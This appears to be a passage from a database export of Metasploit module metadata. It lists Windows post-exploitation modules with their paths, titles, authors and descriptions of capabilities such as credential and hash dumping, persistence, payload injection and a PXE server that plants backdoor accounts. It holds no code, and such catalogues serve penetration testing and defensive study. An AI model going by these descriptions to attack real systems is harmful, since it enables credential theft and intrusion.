00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/total_commander.rb","post","windows/gather/credentials/total_commander","post/windows/gather/credentials/total_commander","Windows Gather Total Commander Saved Password Extraction",300,"This module extracts weakly encrypted saved FTP Passwords from Total Commander. It finds saved FTP connections in the wcx_ftp.ini file.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 1920,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/trillian.rb","post","windows/gather/credentials/trillian","post/windows/gather/credentials/trillian","Windows Gather Trillian Password Extractor",300,"This module extracts account password from Trillian & Trillian Astra v4.x-5.x instant messenger.","Metasploit Framework License (BSD)","f",,,,,"t",,"SecurityXploded Team, Sil3ntDre4m " 1921,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/vnc.rb","post","windows/gather/credentials/vnc","post/windows/gather/credentials/vnc","Windows Gather VNC Password Extraction",300,"This module extract DES encrypted passwords in known VNC locations","Metasploit Framework License (BSD)","f",,,,,"t",,"Kurt Grutzmacher , mubix " 1922,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/windows_autologin.rb","post","windows/gather/credentials/windows_autologin","post/windows/gather/credentials/windows_autologin","Windows Gather AutoLogin User Credential Extractor",300,"This module extracts the plain-text Windows user login password in Registry. It exploits a Windows feature that Windows (2000 to 2008 R2) allows a user or third-party Windows Utility tools to configure User AutoLogin via plain-text password insertion in (Alt)DefaultPassword field in the registry location - HKLM\Software\Microsoft\Windows NT\WinLogon. This is readable by all users.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://core.yehg.net/lab/#tools.exploits, URL-http://support.microsoft.com/kb/315231","Myo Soe " 1923,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/winscp.rb","post","windows/gather/credentials/winscp","post/windows/gather/credentials/winscp","Windows Gather WinSCP Saved Password Extraction",300,"This module extracts weakly encrypted saved passwords from WinSCP. It searches for saved sessions in the Windows Registry and the WinSCP.ini file. It cannot decrypt passwords if a master password is used.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 1924,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/wsftp_client.rb","post","windows/gather/credentials/wsftp_client","post/windows/gather/credentials/wsftp_client","Windows Gather WS_FTP Saved Password Extraction",300,"This module extracts weakly encrypted saved FTP Passwords from WS_FTP. It finds saved FTP connections in the ws_ftp.ini file.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 1925,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/dumplinks.rb","post","windows/gather/dumplinks","post/windows/gather/dumplinks","Windows Gather Dump Recent Files lnk Info",300,"The dumplinks module is a modified port of Harlan Carvey's lslnk.pl Perl script. This module will parse .lnk files from a user's Recent Documents folder and Microsoft Office's Recent Documents folder, if present. Windows creates these link files automatically for many common file types. The .lnk files contain time stamps, file locations, including share names, volume serial numbers, and more.","Metasploit Framework License (BSD)","f",,,,,"t",,"davehull " 1926,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_ad_computers.rb","post","windows/gather/enum_ad_computers","post/windows/gather/enum_ad_computers","Windows Gather AD Enumerate Computers",300,"This module will enumerate computers in the default AD directory. Optional Attributes: objectClass, cn, description, distinguishedName, instanceType, whenCreated, whenChanged, uSNCreated, uSNChanged, name, objectGUID, userAccountControl, badPwdCount, codePage, countryCode, badPasswordTime, lastLogoff, lastLogon, localPolicyFlags, pwdLastSet, primaryGroupID, objectSid, accountExpires, logonCount, sAMAccountName, sAMAccountType, operatingSystem, operatingSystemVersion, operatingSystemServicePack, serverReferenceBL, dNSHostName, rIDSetPreferences, servicePrincipalName, objectCategory, netbootSCPBL, isCriticalSystemObject, frsComputerReferenceBL, lastLogonTimestamp, msDS-SupportedEncryptionTypes","Metasploit Framework License (BSD)","f",,,,,"t",,"Ben Campbell " 1927,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_applications.rb","post","windows/gather/enum_applications","post/windows/gather/enum_applications","Windows Gather Installed Application Enumeration",300,"This module will enumerate all installed applications","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1928,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_artifacts.rb","post","windows/gather/enum_artifacts","post/windows/gather/enum_artifacts","Windows Gather File and Registry Artifacts Enumeration",300,"This module will check the file system and registry for particular artifacts. The list of artifacts is read from data/post/enum_artifacts_list.txt or a user specified file. Any matches are written to the loot.","Metasploit Framework License (BSD)","f",,,,,"t",,"averagesecurityguy " 1929,"2013-05-16 16:06:27","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_chrome.rb","post","windows/gather/enum_chrome","post/windows/gather/enum_chrome","Windows Gather Google Chrome User Data Enumeration",300,"This module will collect user data from Google Chrome and attempt to decrypt sensitive information.","Metasploit Framework License (BSD)","f",,,,,"t",,"Kx499, Sven Taute, mubix , sinn3r " 1930,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_computers.rb","post","windows/gather/enum_computers","post/windows/gather/enum_computers","Windows Gather Enumerate Computers",300,"This module will enumerate computers included in the primary Domain.","Metasploit Framework License (BSD)","f",,,,,"t",,"Joshua Abraham " 1931,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_db.rb","post","windows/gather/enum_db","post/windows/gather/enum_db","Windows Gather Database Instance Enumeration",300,"This module will enumerate a windows system for installed database instances","Metasploit Framework License (BSD)","f",,,,,"t",,"Barry Shteiman , juan vazquez " 1932,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_devices.rb","post","windows/gather/enum_devices","post/windows/gather/enum_devices","Windows Gather Hardware Enumeration",300,"Enumerate PCI hardware information from the registry. Please note this script will run through registry subkeys such as: 'PCI', 'ACPI', 'ACPI_HAL', 'FDC', 'HID', 'HTREE', 'IDE', 'ISAPNP', 'LEGACY'', LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW', and 'USB'; it will take time to finish. It is recommended to run this module as a background job.","Metasploit Framework License (BSD)","f",,,,,"t",,"Brandon Perry " 1933,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_dirperms.rb","post","windows/gather/enum_dirperms","post/windows/gather/enum_dirperms","Windows Gather Directory Permissions Enumeration",300,"This module enumerates directories and lists the permissions set on found directories. Please note: if the PATH option isn't specified, then the module will start enumerate whatever is in the target machine's %PATH% variable.","Metasploit Framework License (BSD)","f",,,,,"t",,"Ben Campbell , Kx499, sinn3r " 1934,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_domain.rb","post","windows/gather/enum_domain","post/windows/gather/enum_domain","Windows Gather Enumerate Domain",300,"This module identifies the primary domain via the registry. The registry value used is: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\DCName.","Metasploit Framework License (BSD)","f",,,,,"t",,"Joshua Abraham " 1935,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_domain_group_users.rb","post","windows/gather/enum_domain_group_users","post/windows/gather/enum_domain_group_users","Windows Gather Enumerate Domain Group",300,"This module extracts user accounts from specified group and stores the results in the loot. It will also verify if session account is in the group. Data is stored in loot in a format that is compatible with the token_hunter plugin. This module should be run over as session with domain credentials.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , Stephen Haywood " 1936,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_domain_tokens.rb","post","windows/gather/enum_domain_tokens","post/windows/gather/enum_domain_tokens","Windows Gather Enumerate Domain Tokens",300,"This module will enumerate tokens present on a system that are part of the domain the target host is part of, will also enumerate users in the local Administrators, Users and Backup Operator groups to identify Domain members. Processes will be also enumerated and checked if they are running under a Domain account, on all checks the accounts, processes and tokens will be checked if they are part of the Domain Admin group of the domain the machine is a member of.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1937,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_domains.rb","post","windows/gather/enum_domains","post/windows/gather/enum_domains","Windows Gather Domain Enumeration",300,"This module enumerates currently the domains a host can see and the domain controllers for that domain.","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 1938,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_files.rb","post","windows/gather/enum_files","post/windows/gather/enum_files","Windows Gather Generic File Collection",300,"This module downloads files recursively based on the FILE_GLOBS option.","Metasploit Framework License (BSD)","f",,,,,"t",,"3vi1john , RageLtMan " 1939,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_hostfile.rb","post","windows/gather/enum_hostfile","post/windows/gather/enum_hostfile","Windows Gather Windows Host File Enumeration",300,"This module returns a list of entries in the target system's hosts file.","BSD License","f",,,,,"t",,"vt " 1940,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_ie.rb","post","windows/gather/enum_ie","post/windows/gather/enum_ie","Windows Gather Internet Explorer User Data Enumeration",300,"This module will collect history, cookies, and credentials (from either HTTP auth passwords, or saved form passwords found in auto-complete) in Internet Explorer. The ability to gather credentials is only supported for versions of IE >=7, while history and cookies can be extracted for all versions.","Metasploit Framework License (BSD)","f",,,,,"t",,"Kx499" 1941,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_logged_on_users.rb","post","windows/gather/enum_logged_on_users","post/windows/gather/enum_logged_on_users","Windows Gather Logged On User Enumeration (Registry)",300,"This module will enumerate current and recently logged on Windows users","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1942,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_ms_product_keys.rb","post","windows/gather/enum_ms_product_keys","post/windows/gather/enum_ms_product_keys","Windows Gather Product Key",300,"This module will enumerate the OS license key","Metasploit Framework License (BSD)","f",,,,,"t",,"Brandon Perry " 1943,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_powershell_env.rb","post","windows/gather/enum_powershell_env","post/windows/gather/enum_powershell_env","Windows Gather Powershell Environment Setting Enumeration",300,"This module will enumerate Microsoft Powershell settings","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1944,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_proxy.rb","post","windows/gather/enum_proxy","post/windows/gather/enum_proxy","Windows Gather Proxy Setting",300,"This module pulls a user's proxy settings. If neither RHOST or SID are set it pulls the current user, else it will pull the user's settings specified SID and target host.","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 1945,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_services.rb","post","windows/gather/enum_services","post/windows/gather/enum_services","Windows Gather Service Info Enumeration",300,"This module will query the system for services and display name and configuration info for each returned service. It allows you to optionally search the credentials, path, or start type for a string and only return the results that match. These query operations are cumulative and if no query strings are specified, it just returns all services. NOTE: If the script hangs, windows firewall is most likely on and you did not migrate to a safe process (explorer.exe for example).","Metasploit Framework License (BSD)","f",,,,,"t",,"Keith Faber, Kx499" 1946,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_shares.rb","post","windows/gather/enum_shares","post/windows/gather/enum_shares","Windows Gather SMB Share Enumeration via Registry",300,"This module will enumerate configured and recently used file shares","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1947,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_snmp.rb","post","windows/gather/enum_snmp","post/windows/gather/enum_snmp","Windows Gather SNMP Settings Enumeration (Registry)",300,"This module will enumerate the SNMP service configuration","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , Tebo " 1948,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_termserv.rb","post","windows/gather/enum_termserv","post/windows/gather/enum_termserv","Windows Gather Terminal Server Client Connection Information Dumper",300,"This module dumps MRU and connection data for RDP sessions","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 1949,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_tokens.rb","post","windows/gather/enum_tokens","post/windows/gather/enum_tokens","Windows Gather Enumerate Domain Admin Tokens (Token Hunter)",300,"This module will identify systems that have a Domain Admin (delegation) token on them. The module will first check if sufficient privileges are present for certain actions, and run getprivs for system. If you elevated privs to system, the SeAssignPrimaryTokenPrivilege will not be assigned, in that case try migrating to another process that is running as system. If no sufficient privileges are available, the script will not continue.","Metasploit Framework License (BSD)","f",,,,,"t",,"Joshua Abraham " 1950,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_tomcat.rb","post","windows/gather/enum_tomcat","post/windows/gather/enum_tomcat","Windows Gather Tomcat Server Enumeration",300,"This module will enumerate a windows system for tomcat servers","Metasploit Framework License (BSD)","f",,,,,"t",,"Barry Shteiman " 1951,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_unattend.rb","post","windows/gather/enum_unattend","post/windows/gather/enum_unattend","Windows Gather Unattended Answer File Enumeration",300,"This module will check the file system for a copy of unattend.xml and/or autounattend.xml found in Windows Vista, or newer Windows systems. And then extract sensitive information such as usernames and decoded passwords.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx, URL-http://technet.microsoft.com/en-us/library/ff715801","Ben Campbell , Sean Verity , sinn3r " 1952,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/forensics/duqu_check.rb","post","windows/gather/forensics/duqu_check","post/windows/gather/forensics/duqu_check","Windows Gather Forensics Duqu Registry Check",300,"This module searches for CVE-2011-3402 (Duqu) related registry artifacts.","Metasploit Framework License (BSD)","f",,,,,"t","CVE-2011-3402, URL-http://r-7.co/w5h7fY","Marcus J. Carey " 1953,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/forensics/enum_drives.rb","post","windows/gather/forensics/enum_drives","post/windows/gather/forensics/enum_drives","Windows Gather Physical Drives and Logical Volumes",300,"This module will list physical drives and logical volumes","Metasploit Framework License (BSD)","f",,,,,"t",,"Wesley McGrew " 1954,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/forensics/imager.rb","post","windows/gather/forensics/imager","post/windows/gather/forensics/imager","Windows Gather Forensic Imaging",300,"This module will perform byte-for-byte imaging of remote disks and volumes","Metasploit Framework License (BSD)","f",,,,,"t",,"Wesley McGrew " 1955,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/forensics/nbd_server.rb","post","windows/gather/forensics/nbd_server","post/windows/gather/forensics/nbd_server","Windows Gather Local NBD Server",300,"Maps remote disks and logical volumes to a local Network Block Device server. Allows for forensic tools to be executed on the remote disk directly.","Metasploit Framework License (BSD)","f",,,,,"t",,"Wesley McGrew " 1956,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/forensics/recovery_files.rb","post","windows/gather/forensics/recovery_files","post/windows/gather/forensics/recovery_files","Windows Gather Deleted Files Enumeration and Recovering",300,"This module list and try to recover deleted files from NTFS file systems. Use the FILES option to guide recovery. Let it empty to enumerate deleted files in the DRIVE. Set FILES to an extension (Ex. ""pdf"") to recover deleted files with that extension. Or set FILES to a comma separated list of IDs (from enumeration) to recover those files. The user must have into account file enumeration and recovery could take a long time, use the TIMEOUT option to abort enumeration or recovery by extension after that time (in seconds).","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://www.youtube.com/watch?v=9yzCf360ujY&hd=1","Borja Merino " 1957,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/hashdump.rb","post","windows/gather/hashdump","post/windows/gather/hashdump","Windows Gather Local User Account Password Hashes (Registry)",300,"This module will dump the local user accounts from the SAM database using the registry","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 1958,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/local_admin_search_enum.rb","post","windows/gather/local_admin_search_enum","post/windows/gather/local_admin_search_enum","Windows Gather Local Admin Search",300,"This module will identify systems in a given range that the supplied domain user (should migrate into a user pid) has administrative access to by using the Windows API OpenSCManagerA to establishing a handle to the remote host. Additionally it can enumerate logged in users and group membership via Windows API NetWkstaUserEnum and NetUserGetGroups.","Metasploit Framework License (BSD)","f",,,,,"t",,"Brandon McCann ""zeknox"" , Royce Davis ""r3dy"" , Thomas McCarthy ""smilingraccoon"" " 1959,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/memory_grep.rb","post","windows/gather/memory_grep","post/windows/gather/memory_grep","Windows Gather Process Memory Grep",300,"This module allows for searching the memory space of a proccess for potentially sensitive data.","Metasploit Framework License (BSD)","f",,,,,"t",,"bannedit " 1960,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/netlm_downgrade.rb","post","windows/gather/netlm_downgrade","post/windows/gather/netlm_downgrade","Windows NetLM Downgrade Attack",300,"This module will change a registry value to enable the sending of LM challenge hashes and then initiate a SMB connection to the SMBHOST datastore. If an SMB server is listening, it will receive the NetLM hashes","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://www.fishnetsecurity.com/6labs/blog/post-exploitation-using-netntlm-downgrade-attacks","Brandon McCann ""zeknox"" , Thomas McCarthy ""smilingraccoon"" " 1961,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/resolve_sid.rb","post","windows/gather/resolve_sid","post/windows/gather/resolve_sid","Windows Gather Local User Account SID Lookup",300,"This module prints information about a given SID from the perspective of this session","Metasploit Framework License (BSD)","f",,,,,"t",,"chao-mu" 1962,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/reverse_lookup.rb","post","windows/gather/reverse_lookup","post/windows/gather/reverse_lookup","Windows Gather IP Range Reverse Lookup",300,"This module uses Railgun, calling the gethostbyaddr function to resolve a hostname to an IP.","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 1963,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/screen_spy.rb","post","windows/gather/screen_spy","post/windows/gather/screen_spy","Windows Gather Screen Spy",300,"This module will incrementally take desktop screenshots from the host. This allows for screen spying which can be useful to determine if there is an active user on a machine, or to record the screen for later data extraction. NOTES: set VIEW_CMD to control how screenshots are opened/displayed, the file name will be appended directly on to the end of the value of VIEW_CMD (use 'auto' to have the module do it's best...default browser for Windows, firefox for *nix, and preview app for macs). 'eog -s -f -w' is a handy VIEW_CMD for *nix. To suppress opening of screenshots all together, set the VIEW_CMD option to 'none'.","Metasploit Framework License (BSD)","f",,,,,"t",,"Adrian Kubok, Roni Bachar , bannedit , kernelsmith " 1964,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/smart_hashdump.rb","post","windows/gather/smart_hashdump","post/windows/gather/smart_hashdump","Windows Gather Local and Domain Controller Account Password Hashes",300,"This will dump local accounts from the SAM Database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on privilege level, OS and role of the host.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1965,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/tcpnetstat.rb","post","windows/gather/tcpnetstat","post/windows/gather/tcpnetstat","Windows Gather TCP Netstat",300,"This Module lists current TCP sessions","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 1966,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/usb_history.rb","post","windows/gather/usb_history","post/windows/gather/usb_history","Windows Gather USB Drive History",300,"This module will enumerate USB Drive history on a target host.","Metasploit Framework License (BSD)","f",,,,,"t",,"nebulus" 1967,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/win_privs.rb","post","windows/gather/win_privs","post/windows/gather/win_privs","Windows Gather Privileges Enumeration",300,"This module will print if UAC is enabled, and if the current account is ADMIN enabled. It will also print UID, foreground SESSION ID, is SYSTEM status and current process PRIVILEGES.","Metasploit Framework License (BSD)","f",,,,,"t",,"Merlyn Cousins " 1968,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/wmic_command.rb","post","windows/gather/wmic_command","post/windows/gather/wmic_command","Windows Gather Run Specified WMIC Command",300,"This module will execute a given WMIC command options or read WMIC commands options from a resource file and execute the commands in the specified Meterpreter session.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1969,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/word_unc_injector.rb","post","windows/gather/word_unc_injector","post/windows/gather/word_unc_injector","Microsoft Word UNC Path Injector",300,"This module modifies a remote .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://jedicorp.com/?p=534","SphaZ " 1970,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/add_user_domain.rb","post","windows/manage/add_user_domain","post/windows/manage/add_user_domain","Windows Manage Add User to the Domain and/or to a Domain Group",300,"This module adds a user to the Domain and/or to a Domain group. It will check if sufficient privileges are present for certain actions and run getprivs for system. If you elevated privs to system,the SeAssignPrimaryTokenPrivilege will not be assigned. You need to migrate to a process that is running as system. If you don't have privs, this script exits.","Metasploit Framework License (BSD)","f",,,,,"t",,"Joshua Abraham " 1971,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/autoroute.rb","post","windows/manage/autoroute","post/windows/manage/autoroute","Windows Manage Network Route via Meterpreter Session",300,"This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a compromised host when connecting to the named NETWORK and SUBMASK.","Metasploit Framework License (BSD)","f",,,,,"t",,"todb " 1972,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/clone_proxy_settings.rb","post","windows/manage/clone_proxy_settings","post/windows/manage/clone_proxy_settings","Windows Manage Proxy Setting Cloner",300,"This module copies the proxy settings from the current user to the targeted user SID, supports remote hosts as well if remote registry is allowed.","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 1973,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/delete_user.rb","post","windows/manage/delete_user","post/windows/manage/delete_user","Windows Manage Local User Account Deletion",300,"This module deletes a local user account from the specified server, or the local machine if no server is given.","Metasploit Framework License (BSD)","f",,,,,"t",,"chao-mu" 1974,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/download_exec.rb","post","windows/manage/download_exec","post/windows/manage/download_exec","Windows Manage Download and/or Execute",300,"This module will download a file by importing urlmon via railgun. The user may also choose to execute the file with arguments via exec_string.","Metasploit Framework License (BSD)","f",,,,,"t",,"RageLtMan" 1975,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/enable_rdp.rb","post","windows/manage/enable_rdp","post/windows/manage/enable_rdp","Windows Manage Enable Remote Desktop",300,"This module enables the Remote Desktop Service (RDP). It provides the options to create an account and configure it to be a member of the Local Administrators and Remote Desktop Users group. It can also forward the target's port 3389/tcp.","BSD License","f",,,,,"t",,"Carlos Perez " 1976,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/inject_ca.rb","post","windows/manage/inject_ca","post/windows/manage/inject_ca","Windows Manage Certificate Authority Injection",300,"This module allows the attacker to insert an arbitrary CA certificate into the victim's Trusted Root store.","BSD License","f",,,,,"t",,"vt " 1977,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/inject_host.rb","post","windows/manage/inject_host","post/windows/manage/inject_host","Windows Manage Hosts File Injection",300,"This module allows the attacker to insert a new entry into the target system's hosts file.","BSD License","f",,,,,"t",,"vt " 1978,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/migrate.rb","post","windows/manage/migrate","post/windows/manage/migrate","Windows Manage Process Migration",300,"This module will migrate a Meterpreter session from one process to another. A given process PID to migrate to or the module can spawn one and migrate to that newly spawned process.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1979,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/mssql_local_auth_bypass.rb","post","windows/manage/mssql_local_auth_bypass","post/windows/manage/mssql_local_auth_bypass","Windows Manage Local Microsoft SQL Server Authorization Bypass",300,"When this module is executed, it can be used to add a sysadmin to local SQL Server instances. It first attempts to gain LocalSystem privileges using the ""getsystem"" escalation methods. If those privileges are not sufficient to add a sysadmin, then it will migrate to the SQL Server service process associated with the target instance. The sysadmin login is added to the local SQL Server using native SQL clients and stored procedures. If no instance is specified then the first identified instance will be used. Why is this possible? By default in SQL Server 2k-2k8, LocalSystem is assigned syadmin privileges. Microsoft changed the default in SQL Server 2012 so that LocalSystem no longer has sysadmin privileges. However, this can be overcome by migrating to the SQL Server process.","Metasploit Framework License (BSD)","f",,,,,"t",,"Scott Sutherland " 1980,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/multi_meterpreter_inject.rb","post","windows/manage/multi_meterpreter_inject","post/windows/manage/multi_meterpreter_inject","Windows Manage Inject in Memory Multiple Payloads",300,"This module will inject in to several process a given payload and connecting to a given list of IP Addresses. The module works with a given lists of IP Addresses and process PIDs if no PID is given it will start a the given process in the advanced options and inject the selected payload in to the memory of the created module.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1981,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/nbd_server.rb","post","windows/manage/nbd_server","post/windows/manage/nbd_server","Windows Manage Local NBD Server for Remote Disks",300,"Maps remote disks and logical volumes to a local Network Block Device server. Allows for forensic tools to be executed on the remote disk directly.","Metasploit Framework License (BSD)","f",,,,,"t",,"Wesley McGrew " 1982,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/payload_inject.rb","post","windows/manage/payload_inject","post/windows/manage/payload_inject","Windows Manage Memory Payload Injection Module",300,"This module will inject into the memory of a process a specified windows payload. If a payload or process is not provided one will be created by default using a reverse x86 TCP Meterpreter Payload.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1983,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/persistence.rb","post","windows/manage/persistence","post/windows/manage/persistence","Windows Manage Persistent Payload Installer",300,"This Module will create a boot persistent reverse Meterpreter session by installing on the target host the payload as a script that will be executed at user logon or system startup depending on privilege and selected startup method. REXE mode will transfer a binary of your choosing to remote host to be used as a payload.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , Merlyn drforbin Cousins " 1984,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/powershell/exec_powershell.rb","post","windows/manage/powershell/exec_powershell","post/windows/manage/powershell/exec_powershell","Windows Manage PowerShell Download and/or Execute",300,"This module will download and execute a PowerShell script over a meterpreter session. The user may also enter text substitutions to be made in memory before execution. Setting VERBOSE to true will output both the script prior to execution and the results.","Metasploit Framework License (BSD)","f",,,,,"t",,"Nicholas Nam (nick , RageLtMan" 1985,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/pxexploit.rb","post","windows/manage/pxexploit","post/windows/manage/pxexploit","Windows Manage PXE Exploit Server",300,"This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive; placing a payload to install metsvc, disable the firewall, and add a new user metasploit on any Windows partition seen, and add a uid 0 user with username and password metasploit to any linux partition seen. The windows user will have the password p@SSw0rd!123456 (in case of complexity requirements) and will be added to the administrators group. See exploit/windows/misc/pxesploit for a version to deliver a specific payload. Note: the displayed IP address of a target is the address this DHCP server handed out, not the ""normal"" IP address the host uses.","Metasploit Framework License (BSD)","f",,,,,"t",,"scriptjunkie" 1986,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/reflective_dll_inject.rb","post","windows/manage/reflective_dll_inject","post/windows/manage/reflective_dll_inject","Windows Manage Reflective DLL Injection Module",300,"This module will inject into the memory of a process a specified Reflective DLL.","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","Ben Campbell " 1987,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/remove_ca.rb","post","windows/manage/remove_ca","post/windows/manage/remove_ca","Windows Manage Certificate Authority Removal",300,"This module allows the attacker to remove an arbitrary CA certificate from the victim's Trusted Root store.","BSD License","f",,,,,"t",,"vt " 1988,"2013-05-07 